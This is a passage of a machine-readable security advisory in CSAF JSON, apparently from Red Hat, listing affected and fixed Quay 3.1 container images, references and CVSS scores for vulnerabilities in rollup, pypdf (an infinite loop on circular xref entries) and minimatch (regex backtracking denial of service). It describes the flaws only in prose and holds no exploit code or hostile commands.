"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "rollup: Rollup: Remote Code Execution via Path Traversal Vulnerability"
},
{
"cve": "CVE-2026-27628",
"cwe": {
"id": "CWE-835",
"name": "Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027)"
},
"discovery_date": "2026-02-25T04:02:09.864561+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2442543"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in pypdf. Processing a specially crafted PDF document, specifically with circular /Prev references in the cross-reference (xref) chain, can cause an infinite loop and a high consumption of CPU, resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "pypdf: possible infinite loop when loading circular /Prev entries in cross-reference streams",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this flaw, an attacker must be able to supply a crafted PDF file to be processed by an application using the pypdf library. This issue can cause the application to enter an infinite loop and consume a high amount of CPU resources, eventually resulting in a denial of service with no other security impact. Due to these reasons, this vulnerability has been rated with a moderate impact.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27628"
},
{
"category": "external",
"summary": "RHBZ#2442543",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442543"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27628",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27628"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27628",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27628"
},
{
"category": "external",
"summary": "https://github.com/py-pdf/pypdf/commit/0fbd95938724ad2d72688d4112207c0590f0483f",
"url": "https://github.com/py-pdf/pypdf/commit/0fbd95938724ad2d72688d4112207c0590f0483f"
},
{
"category": "external",
"summary": "https://github.com/py-pdf/pypdf/issues/3654",
"url": "https://github.com/py-pdf/pypdf/issues/3654"
},
{
"category": "external",
"summary": "https://github.com/py-pdf/pypdf/security/advisories/GHSA-2rw7-x74f-jg35",
"url": "https://github.com/py-pdf/pypdf/security/advisories/GHSA-2rw7-x74f-jg35"
}
],
"release_date": "2026-02-25T02:45:37.543000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-24T18:02:58+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5665"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "pypdf: possible infinite loop when loading circular /Prev entries in cross-reference streams"
},
{
"cve": "CVE-2026-27904",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"discovery_date": "2026-02-26T02:01:23.004531+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2442922"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in minimatch. A remote attacker could exploit this vulnerability by providing a specially crafted glob expression with nested unbounded quantifiers. This could lead to catastrophic backtracking in the V8 JavaScript engine, causing the application to become unresponsive and resulting in a Denial of Service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Exploitation of this flaw requires that a user or service processes untrusted input.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27904"
},
{
"category": "external",
"summary": "RHBZ#2442922",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442922"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27904",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27904"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27904",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27904"
},
{
"category": "external",
